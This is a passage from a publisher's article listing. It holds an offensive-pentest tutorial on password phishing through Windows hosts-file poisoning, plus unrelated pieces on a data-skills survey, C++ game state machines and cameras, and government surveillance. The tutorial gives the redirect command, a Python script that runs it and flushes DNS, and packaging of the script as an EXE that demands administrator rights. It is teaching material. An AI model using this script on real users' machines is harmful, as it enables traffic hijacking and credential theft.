clear-text value. Also, before sending anything to the Kali machine, we will encrypt it first, just like we did on the Kali side. Now, run the script on both sides. Keep Wireshark running in background at the Kali side. Let's start with the ipconfig. So on the target side, we will able to decipher or decrypt the encrypted message back to clear text successfully. Now, to verify that we got the encryption in the transit path, on the Wireshark, if we right-click on the particular IP and select Follow TCP Stream in Wireshark, we will see that the message has been encrypted before being sent out to the TCP socket. To summarize, we learned to safeguard our TCP tunnel during passage of information using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn to protect the TCP tunnel using RSA. IoT Forensics: Security in an always connected world where things talk Top 5 penetration testing tools for ethical hackers Top 5 cloud security threats to look out for in 2018
Read more
  • 0
  • 0
  • 32335

article-image-phish-for-passwords-using-dns-poisoning
Savia Lobo
14 Jun 2018
6 min read
Save for later

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons.  In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais.  Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing
Read more
  • 0
  • 0
  • 39769

article-image-data-professionals-planning-to-learn-this-year-python-deep-learning
Amey Varangaonkar
14 Jun 2018
4 min read
Save for later

What are data professionals planning to learn this year? Python, deep learning, yes. But also...

Amey Varangaonkar
14 Jun 2018
4 min read
One thing that every data professional absolutely dreads is the day their skills are no longer relevant in the market. In an ever-changing tech landscape, one must be constantly on the lookout for the most relevant, industrially-accepted tools and frameworks. This is applicable everywhere - from application and web developers to cybersecurity professionals. Not even the data professionals are excluded from this, as new ways and means to extract actionable insights from raw data are being found out almost every day. Gone are the days when data pros stuck to a single language and a framework to work with their data. Frameworks are more flexible now, with multiple dependencies across various tools and languages. Not just that, new domains are being identified where these frameworks can be applied, and how they can be applied varies massively as well. A whole new arena of possibilities has opened up, and with that new set of skills and toolkits to work on these domains have also been unlocked. What’s the next big thing for data professionals? We recently polled thousands of data professionals as part of our Skill-Up program, and got some very interesting insights into what they think the future of data science looks like. We asked them what they were planning to learn in the next 12 months. The following word cloud is the result of their responses, weighted by frequency of the tools they chose: What data professionals are planning on learning in the next 12 months Unsurprisingly, Python comes out on top as the language many data pros want to learn in the coming months. With its general-purpose nature and innumerable applications across various use-cases, Python’s sky-rocketing popularity is the reason everybody wants to learn it. Machine learning and AI are finding significant applications in the web development domain today. They are revolutionizing the customers’ digital experience through conversational UIs or chatbots. Not just that, smart machine learning algorithms are being used to personalize websites and their UX. With all these reasons, who wouldn’t want to learn JavaScript, as an important tool to have in their data science toolkit? Add to that the trending web dev framework Angular, and you have all the tools to build smart, responsive front-end web applications. We also saw data professionals taking active interest in the mobile and cloud domains as well. They aim to learn Kotlin and combine its power with the data science tools for developing smarter and more intelligent Android apps. When it comes to the cloud, Microsoft’s Azure platform has introduced many built-in machine learning capabilities, as well as a workbench for data scientists to develop effective, enterprise-grade models. Data professionals also prefer Docker containers to run their applications seamlessly, and hence its learning need seems to be quite high. [box type="shadow" align="" class="" width=""]Has machine learning with JavaScript caught your interest? Don’t worry, we got you covered - check out Hands-on Machine Learning with JavaScript for a practical, hands-on coverage of the essential machine learning concepts using the leading web development language. [/box] With Crypto’s popularity off the roof (sadly, we can’t say the same about Bitcoin’s price), data pros see Blockchain as a valuable skill. Building secure, decentralized apps is on the agenda for many, perhaps. Cloud, Big Data, Artificial Intelligence are some of the other domains that the data pros find interesting, and feel worth skilling up in. Work-related skills that data pros want to learn We also asked the data professionals what skills the data pros wanted to learn in the near future that could help them with their daily jobs more effectively. The following word cloud of their responses paints a pretty clear picture: Valuable skills data professionals want to learn for their everyday work As Machine learning and AI go mainstream, so do their applications in mainstream domains - often resulting in complex problems. Well, there’s deep learning and specifically neural networks to tackle these problems, and these are exactly the skills data pros want to master in order to excel at their work. [box type="shadow" align="" class="" width=""]Data pros want to learn Machine Learning in Python. Do you? Here’s a useful resource for you to get started - check out Python Machine Learning, Second Edition today![/box] So, there it is! What are the tools, languages or frameworks that you are planning to learn in the coming months? Do you agree with the results of the poll? Do let us know. What are web developers favorite front-end tools? Packt’s Skill Up report reveals all Data cleaning is the worst part of data analysis, say data scientists 15 Useful Python Libraries to make your Data Science tasks Easier
Read more
  • 0
  • 0
  • 42899
article-image-building-c-game-play-engines-in-finite-state-machine-pattern
Amarabha Banerjee
14 Jun 2018
20 min read
Save for later

Building C++ game play engines in finite state machine pattern [Tutorial]

Amarabha Banerjee
14 Jun 2018
20 min read
One of the most important aspect of game development is creating game states which helps in different tasks like controlling game flows, managing different game windows and so on. Here in this article, we are going to show you how you can create game play systems with C++ which will help you to manage game states and empower you to control different game functionalities efficiently. We use game states in many different ways. For example to control the game flow, handle the different ways characters can act and react, even for simple menu navigation. Needless to say, states are an important requirement for a strong and manageable code base. There are many different types of states machines; the one we will focus in this section is the Finite State Machine (FSM) pattern. We will be creating an FSM pattern that will help you to create a more generic and flexible state machine. This article is taken from the book Mastering C++ game Development written by Mickey Macdonald. This book shows you how you can create interesting and fun filled games with C++. There are a few ways we can implement a simple state machine in our game. One way would be to simply use a switch case set up to control the states and an enum structure for the state types. An example of this would be as follows: enum PlayerState { Idle, Walking } ... PlayerState currentState = PlayerState::Idle; //A holder variable for the state currently in ... // A simple function to change states void ChangeState(PlayState nextState) { currentState = nextState; } void Update(float deltaTime) { ... switch(currentState) { case PlayerState::Idle: ... //Do idle stuff //Change to next state ChangeState(PlayerState::Walking); break; case PlayerState::Walking: ... //Do walking stuff //Change to next state ChangeState(PlayerState::Idle); break; } ... } Using a switch/case like this can be effective for a lot of situations, but it does have some strong drawbacks. What if we decide to add a few more states? What if we decide to add branching and more if conditionals? The simple switch/case we started out with has suddenly become very large and undoubtedly unwieldy. Every time we want to make a change or add some functionality, we multiply the complexity and introduce more chances for bugs to creep in. We can help mitigate some of these issues and provide more flexibility by taking a slightly different approach and using classes to represent our states. Through the use of inheritance and polymorphism, we can build a structure that will allow us to chain together states and provide the flexibility to reuse them in many situations. Let's walk through how we can implement this in our demo examples, starting with the base class we will inherit from in the future, IState: ... namespace BookEngine { class IState { public: IState() {} virtual ~IState(){} // Called when a state enters and exits virtual void OnEntry() = 0; virtual void OnExit() = 0; // Called in the main game loop virtual void Update(float deltaTime) = 0; }; } As you can see, this is just a very simple class that has a constructor, a virtual destructor, and three completely virtual functions that each inherited state must override. OnEntry, which will be called as the state is first entered, will only execute once per state change. OnExit, like OnEntry, will only be executed once per state change and is called when the state is about to be exited. The last function is the Update function; this will be called once per game loop and will contain much of the state's logic. Although this seems very simple, it gives us a great starting point to build more complex states. Now let's implement this basic IState class in our examples and see how we can use it for one of the common needs of a state machine: creating game states. First, we will create a new class called GameState that will inherit from IState. This will be the new base class for all the states our game will need. The GameState.h file consists of the following: #pragma once #include <BookEngineIState.h> class GameState : BookEngine::IState { public: GameState(); ~GameState(); //Our overrides virtual void OnEntry() = 0; virtual void OnExit() = 0; virtual void Update(float deltaTime) = 0; //Added specialty function virtual void Draw() = 0; }; The GameState class is very much like the IState class it inherits from, except for one key difference. In this class, we add a new virtual method Draw() that all classes will now inherit from GameState will be implemented. Each time we use IState and create a new specialized base class, player state, menu state, and so on, we can add these new functions to customize it to the requirements of the state machine. This is how we use inheritance and polymorphism to create more complex states and state machines. Continuing with our example, let's now create a new GameState. We start by creating a new class called GameWaiting that inherits from GameState. To make it a little easier to follow, I have grouped all of the new GameState inherited classes into one set of files GameStates.h and GameStates.cpp. The GamStates.h file will look like the following: #pragma once #include "GameState.h" class GameWaiting: GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; class GameRunning: GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; class GameOver : GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; Nothing new here; we are just declaring the functions for each of our GameState classes. Now, in our GameStates.cpp file, we can implement each individual state's functions as described in the preceding code: #include "GameStates.h" void GameWaiting::OnEntry() { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::OnExit() { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::Update(float deltaTime) { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::Draw() { ... //Called when entering the GameWaiting state's OnEntry function ... } ... //Other GameState implementations ... For the sake of page space, I am only showing the GameWaiting implementation, but the same goes for the other states. Each one will have its own unique implementation of these functions, which allows you to control the code flow and implement more states as necessary without creating a hard-to-follow maze of code paths. Now that we have our states defined, we can implement them in our game. Of course, we could go about this in many different ways. We could follow the same pattern that we did with our screen system and implement a GameState list class, a definition of which could look like the following: class GameState; class GameStateList { public: GameStateList (IGame* game); ~ GameStateList (); GameState* GoToNext(); GameState * GoToPrevious(); void SetCurrentState(int nextState); void AddState(GameState * newState); void Destroy(); GameState* GetCurrent(); protected: IGame* m_game = nullptr; std::vector< GameState*> m_states; int m_currentStateIndex = -1; }; } Or we could simply use the GameState classes we created with a simple enum and a switch case. The use of the state pattern allows for this flexibility. Working with cameras At this point, we have discussed a good amount about the structure of systems and have now been able to move on to designing ways of interacting with our game and 3D environment. This brings us to an important topic: the design of virtual camera systems. A camera is what provides us with a visual representation of our 3D world. It is how we immerse ourselves and it provides us with feedback on our chosen interactions. In this section, we are going to cover the concept of a virtual camera in computer graphics. Before we dive into writing the code for our camera, it is important to have a strong understanding of how, exactly, it all works. Let's start with the idea of being able to navigate around the 3D world. In order to do this, we need to use what is referred to as a transformation pipeline. A transformation pipeline can be thought of as the steps that are taken to transform all objects and points relative to the position and orientation of a camera viewpoint. The following is a simple diagram that details the flow of a transformation pipeline: Beginning with the first step in the pipeline, local space, when a mesh is created it has a local origin 0 x, 0 y, 0 z. This local origin is typically located in either the center of the object or in the case of some player characters, the center of the feet. All points that make up that mesh are then based on that local origin. When talking about a mesh that has not been transformed, we refer to it as being in local space: The preceding image pictures the gnome mesh in a model editor. This is what we would consider local space. In the next step, we want to bring a mesh into our environment, the world space. In order to do this, we have to multiply our mesh points by what is referred to as a model matrix. This will then place the mesh in world space, which sets all the mesh points to be relative to a single world origin. It's easiest to think of world space as being the description of the layout of all the objects that make up your game's environment. Once meshes have been placed in world space, we can start to do things such as compare distances and angles. A great example of this step is when placing game objects in a world/level editor; this is creating a description of the model's mesh in relation to other objects and a single world origin (0,0,0). We will discuss editors in more detail in the next chapter. Next, in order to navigate this world space, we have to rearrange the points so that they are relative to the camera's position and orientations. To accomplish this, we perform a few simple operations. The first is to translate the objects to the origin. First, we would move the camera from its current world coordinates. In the following example figure, there is 20 on the x axis, 2 on the y axis, and -15 on the z axis, to the world origin or 0,0,0. We can then map the objects by subtracting the camera's position, the values used to translate the camera object, which in this case would be -20, -2, 15. So if our game object started out at 10.5 on the x axis, 1 on the y axis, and -20 on the z axis, the newly translated coordinates would be -9.5, -1, -5. The last operation is to rotate the camera to face the desired direction; in our current case, that would be pointing down the -z axis. For the following example, that would mean rotating the object points by -90 degrees, making the example game object's new position 5, -1, -9.5. These operations combine into what is referred to as the view matrix: Before we go any further, I want to briefly cover some important details when it comes to working with matrices, in particular, handling matrix multiplication and the order of operations. When working with OpenGL, all matrices are defined in a column-major layout. The opposite being row-major layout, found in other graphics libraries such as Microsoft's DirectX. The following is the layout for column-major view matrices, where U is the unit vector pointing up, F is our vector pointing forward, R is the right vector, and P is the position of the camera: When constructing a matrix with a combination of translations and rotations, such as the preceding view matrix, you cannot, generally, just stick the rotation and translation values into a single matrix. In order to create a proper view matrix, we need to use matrix multiplication to combine two or more matrices into a single final matrix. Remembering that we are working with column-major notations, the order of the operations is therefore right to left. This is important since, using the orientation (R) and translation (T) matrices, if we say V = T x R, this would produce an undesired effect because this would first rotate the points around the world origin and then move them to align to the camera position as the origin. What we want is V = R x T, where the points would first align to the camera as the origin and then apply the rotation. In a row-major layout, this is the other way around of course: The good news is that we do not necessarily need to handle the creation of the view matrix manually. Older versions of OpenGL and most modern math libraries, including GLM, have an implementation of a lookAt() function. Most take a version of camera position, target or look position, and the up direction as parameters, and return a fully created view matrix. We will be looking at how to use the GLM implementation of the lookAt() function shortly, but if you want to see the full code implementation of the ideas described just now, check out the source code of GLM which is included in the project source repository. Continuing through the transformation pipeline, the next step is to convert from eye space to homogeneous clip space. This stage will construct a projection matrix. The projection matrix is responsible for a few things. First is to define the near and far clipping planes. This is the visible range along the defined forward axis (usually z). Anything that falls in front of the near distance and anything that falls past the far distance is considered out of range. Any geometrical objects that are on the outside of this range will be clipped (removed) from the pipeline in a later step. Second is to define the Field of View (FOV). Despite the name, the field of view is not a field but an angle. For the FOV, we actually only specify the vertical range; most modern games use 66 or 67 degrees for this. The horizontal range will be calculated for us by the matrix once we provide the aspect ratio (how wide compared to how high). To demonstrate, a 67 degree vertical angle on a display with a 4:3 aspect ratio would have a FOV of 89.33 degrees (67 * 4/3 = 89.33). These two steps combine to create a volume that takes the shape of a pyramid with the top chopped off. This created volume is referred to as the view frustum. Any of the geometry that falls outside of this frustum is considered to be out of view. The following diagram illustrates what the view frustum looks like: You might note that there is more visible space available at the end of the frustum than in the front. In order to properly display this on a 2D screen, we need to tell the hardware how to calculate the perspective. This is the next step in the pipeline. The larger, far end of the frustum will be pushed together creating a box shape. The collection of objects visible at this wide end will also be squeezed together; this will provide us with a perspective view. To understand this, imagine the phenomenon of looking along a straight stretch of railway tracks. As the tracks continue into the distance, they appear to get smaller and closer together. The next step in the pipeline, after defining the clipping space, is to use what is called the perspective division to normalize the points into a box shape with the dimensions of (-1 to 1, -1 to 1, -1 to 1). This is referred to as the normalized device space. By normalizing the dimensions into unit size, we allow the points to be multiplied to scale up or down to any viewport dimensions. The last major step in the transformation pipeline is to create the 2D representation of the 3D that will be displayed. To do this, we flatten the normalized device space with the objects further away being drawn behind the objects that are closer to the camera (draw depth). The dimensions are scaled from the X and Y normalized values into actual pixel values of the viewport. After this step, we have a 2D space referred to as the Viewport space. That completes the transformation pipeline stages. With that theory covered, we can now shift to implementation and write some code. We are going to start by looking at the creation of a basic, first person 3D camera, which means we are looking through the eyes of the player's character. Let's start with the camera's header file, Camera3D.h in the source code repository: ... #include <glm/glm.hpp> #include <glm/gtc/matrix_transform.hpp> ..., We start with the necessary includes. As I just mentioned, GLM includes support for working with matrices, so we include both glm.hpp and the matrix_transform.hpp to gain access to GLM's lookAt() function: ... public: Camera3D(); ~Camera3D(); void Init(glm::vec3 cameraPosition = glm::vec3(4,10,10), float horizontalAngle = -2.0f, float verticalAngle = 0.0f, float initialFoV = 45.0f); void Update(); Next, we have the public accessible functions for our Camera3D class. The first two are just the standard constructor and destructor. We then have the Init() function. We declare this function with a few defaults provided for the parameters; this way if no values are passed in, we will still have values to calculate our matrices in the first update call. That brings us to the next function declared, the Update() function. This is the function that the game engine will call each loop to keep the camera updated: glm::mat4 GetView() { return m_view; }; glm::mat4 GetProjection() { return m_projection; }; glm::vec3 GetForward() { return m_forward; }; glm::vec3 GetRight() { return m_right; }; glm::vec3 GetUp() { return m_up; }; After the Update() function, there is a set of five getter functions to return both the View and Projection matrices, as well as the camera's forward, up, and right vectors. To keep the implementation clean and tidy, we can simply declare and implement these getter functions right in the header file: void SetHorizontalAngle(float angle) { m_horizontalAngle = angle; }; void SetVerticalAngle(float angle) { m_verticalAngle = angle; }; Directly after the set of getter functions, we have two setter functions. The first will set the horizontal angle, the second will set the vertical angle. This is useful for when the screen size or aspect ratio changes: void MoveCamera(glm::vec3 movementVector) { m_position += movementVector; }; The last public function in the Camera3D class is the MoveCamera() function. This simple function takes in a vector 3, then cumulatively adds that vector to the m_position variable, which is the current camera position: ... private: glm::mat4 m_projection; glm::mat4 m_view; // Camera matrix For the private declarations of the class, we start with two glm::mat4 variables. A glm::mat4 is the datatype for a 4x4 matrix. We create one for the view or camera matrix and one for the projection matrix: glm::vec3 m_position; float m_horizontalAngle; float m_verticalAngle; float m_initialFoV; Next, we have a single vector 3 variable to hold the position of the camera, followed by three float values—one for the horizontal and one for the vertical angles, as well as a variable to hold the field of view: glm::vec3 m_right; glm::vec3 m_up; glm::vec3 m_forward; We then have three more vector 3 variable types that will hold the right, up, and forward values for the camera object. Now that we have the declarations for our 3D camera class, the next step is to implement any of the functions that have not already been implemented in the header file. There are only two functions that we need to provide, the Init() and the Update() functions. Let's begin with the Init() function, found in the Camera3D.cpp file: void Camera3D::Init(glm::vec3 cameraPosition, float horizontalAngle, float verticalAngle, float initialFoV) { m_position = cameraPosition; m_horizontalAngle = horizontalAngle; m_verticalAngle = verticalAngle; m_initialFoV = initialFoV; Update(); } ... Our Init() function is straightforward; all we are doing in the function is taking in the provided values and setting them to the corresponding variable we declared. Once we have set these values, we simply call the Update() function to handle the calculations for the newly created camera object: ... void Camera3D::Update() { m_forward = glm::vec3( glm::cos(m_verticalAngle) * glm::sin(m_horizontalAngle), glm::sin(m_verticalAngle), glm::cos(m_verticalAngle) * glm::cos(m_horizontalAngle) ); The Update() function is where all of the heavy lifting of the classes is done. It starts out by calculating the new forward for our camera. This is done with a simple formula leveraging GLM's cosine and sine functions. What is occurring is that we are converting from spherical coordinates to cartesian coordinates so that we can use the value in the creation of our view matrix. m_right = glm::vec3( glm::sin(m_horizontalAngle - 3.14f / 2.0f), 0, glm::cos(m_horizontalAngle - 3.14f / 2.0f) ); After we calculate the new forward, we then calculate the new right vector for our camera, again using a simple formula that leverages GLM's sine and cosine functions: m_up = glm::cross(m_right, m_forward); Now that we have the forward and up vectors calculated, we can use GLM's cross-product function to calculate the new up vector for our camera. It is important that these three steps happen every time the camera changes position or rotation, and before the creation of the camera's view matrix: float FoV = m_initialFoV; Next, we specify the FOV. Currently, I am just setting it back to the initial FOV specified when initializing the camera object. This would be the place to recalculate the FOV if the camera was, say, zoomed in or out (hint: mouse scroll could be useful here): m_projection = glm::perspective(glm::radians(FoV), 4.0f / 3.0f, 0.1f, 100.0f); Once we have the field of view specified, we can then calculate the projection matrix for our camera. Luckily for us, GLM has a very handy function called glm::perspective(), which takes in a field of view in radians, an aspect ratio, the near clipping distance, and a far clipping distance, which will then return a created projection matrix for us. Since this is an example, I have specified a 4:3 aspect ratio (4.0f/3.0f) and a clipping space of 0.1 units to 100 units directly. In production, you would ideally move these values to variables that could be changed during runtime: m_view = glm::lookAt( m_position, m_position + m_forward, m_up ); } Finally, the last thing we do in the Update() function is to create the view matrix. As I mentioned before, we are fortunate that the GLM library supplies a lookAt() function to abstract all the steps we discussed earlier in the section. This lookAt() function takes three parameters. The first is the position of the camera. The second is a vector value of where the camera is pointed, or looking at, which we provide by doing a simple addition of the camera's current position and it's calculated forward. The last parameter is the camera's current up vector which, again, we calculated previously. Once finished, this function will return the newly updated view matrix to use in our graphics pipeline. We learned to create a simple FSM game engine with C++. Checkout this book Mastering C++ game Development to learn high-end game development with advanced C++ 17 programming techniques. How AI is changing game development How to use arrays, lists, and dictionaries in Unity for 3D game development Unity 2D & 3D game kits simplify Unity game development for beginners
Read more
  • 0
  • 0
  • 48354

article-image-alarming-ways-governments-use-surveillance-tech
Neil Aitken
14 Jun 2018
12 min read
Save for later

Alarming ways governments are using surveillance tech to watch you

Neil Aitken
14 Jun 2018
12 min read
Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and PapaJohns pizza. The company is about to release an app that users can install on their smartphone. Their new application will record and transmit video images of what’s happening in front of your vehicle, as you travel. Data can be sent from any phone with a camera – using the most common of tools – a simple mobile data plan, for example. In exchange, you’ll get live traffic updates, among other things. Mapquest will use the video image data they gather to provide more accurate and up to date maps to their partners. The real world is changing all the time – roads get added, cities re-route traffic from time to time. The new AI based technology Mapquest employ could well improve the reliability of driverless cars, which have to engage with this ever changing landscape, in a safe manner. No-one disagrees with safety improvements. Mapquests solution is impressive technology. The fact that they can use AI to interpret the images they see and upload the information they receive to update maps is incredible. And, in this regard, the company is just one of the myriad daily news stories which excite and astound us. These stories do, however, often have another side to them which is rarely acknowledged. In the wrong hands, Mapquest’s solution could create a surveillance database which tracked people in real time. Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal. The principle is simple. The more ‘they’ know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or potentially, to change your mind, without even realising that you had been watched. Mapquest’s innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise. Read also: What does the US government know about you? The truth beyond the Facebook scandal Facebook’s share price fell 14% in early 2018 as a result of public outcry related to the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Technology tools like Mapquest’s tracking capabilities and Facebook’s profiling techniques are being taken and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developing world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that will genuinely make you want to consider going off grid! Innovative, Ingenious overlords: US companies have a flare for surveillance The US is the centre for information based technology companies. Much of what they develop is exported as well as used domestically. The police are using human genome matching to track down criminals and can find ‘any family in the country’ There have been 2 recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andme to sequence their genome (DNA) either to investigate further their family tree, or to determine the potential of a pre-disposition to the gene based component of a disease. In one example, The Golden State Killer, an ex cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andme with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service and it is believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, the law enforcement has the DNA of every individual in the country available to them. Domain Awareness Centers (DAC) bring the Truman Show to life The 400,000 Residents of Oakland, California discovered in 2012, that they had been the subject of an undisclosed mass surveillance project, by the local police force, for many years. Feeds from CCTV cameras installed in Oakland’s suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland’s port with Federal funding as part of a national response to the events of 9.11.2001 but was extended to cover the near half million residents of the city. Hundreds of additional video cameras were installed, along with gunshot recognition microphones and some of the other surveillance technologies provided in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept. Internet connected toys spy on children The FBI has warned Americans that children’s toys connected to the internet ‘could put the privacy and safety of children at risk.' Children’s toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI’s press release. Internet connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them. Oracle suggest Google’s Android operating system routinely tracks users’ position even when maps are turned off In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users’ location (including altitude), even when mapping software is turned off on the device. The tracking is performed in the background of their phone. In Australia alone, Oracle suggested that Google’s monitoring could involve around 1GB of additional mobile data every month, costing users nearly half a billion dollars a year, collectively. Amazon facial recognition in real time helps US law enforcement services Amazon are providing facial recognition services which take a feed from public video cameras, to a number of US Police Forces. Amazon can match images taken in real time to a database containing ‘millions of faces.’ Are there any state or Federal rules in place to govern police facial recognition? Wired reported that there are ‘more or less none.’ Amazon’s scheme is a trial taking place in Florida. There are at least 2 other companies offering similar schemes in the US to law enforcement services. Big glass microphone can help agencies keep an ear on the ground Project ‘Big Glass Microphone’ uses the vibrations that the movements of cars (among other things) cause in the buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University Campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure - the way your phone and computer connect to the internet. Big glass microphone as it stands is the first step towards ‘invisible’ monitoring of people and their assets. It appears the FBI now have the ability to crack/access any phone Those in the know suggest that Apple’s iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernadino shooters and ultimately sued Apple in an attempt to force the company to grant access to it, as part of their investigation. The case was ultimately dropped leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple’s assistance, implying that even the most secure phones can now be accessed by authorities. Cornell University’s lie detecting algorithm Groundbreaking work by Cornell University will provide ‘at a distance’ access to information that previously required close personal access to an accused subject. Cornell’s solution interprets feeds from a number of video cameras on subjects and analyses the results to judge their heart rate. They believe the system can be used to determine if someone is lying from behind a screen. University of Southern California can anticipate social unrest with social media feeds Researchers at the University Of Southern California have developed an AI tool to study Social Media posts and determine whether those writing them are likely to cause Social Unrest. The software claims to have identified an association between both the volume of tweets written / the content of those tweets and protests turning physical. They can now offer advice to law enforcement on the likelihood of a protest turning violent so they can be properly prepared based on this information. The UK, an epicenter of AI progress, is not far behind in tracking people The UK has a similarly impressive array of tools at its disposal to watch the people that representatives of the country feels may be required. Given the close levels of cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners. Project stingray – fake cell phone/mobile phone ‘towers’ to intercept communications Stingray is a brand name for an IMSI (the unique identifier on a SIM card) tracker. They ‘spoof’ real towers, presenting themselves as the closest mobile phone tower. This ‘fools’ phones in to connecting to them. The technology has been used to spy on criminals in the UK but it is not just the UK government which use Stingray or its equivalents. The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the Whitehouse, using the same technology. UK developed Spyware is being used by authoritarian regimes Gamma International is a company based in Hampshire UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware delivered with a virus on to computers in their country. Once installed, the software permitted the government to monitor private digital interactions, without the need to engage the phone company or ISP offering those services. Any internet based technology could be tracked, assisting in tracking down individuals who may have negative feelings about the Egyptian government. Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand A Drug Dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an 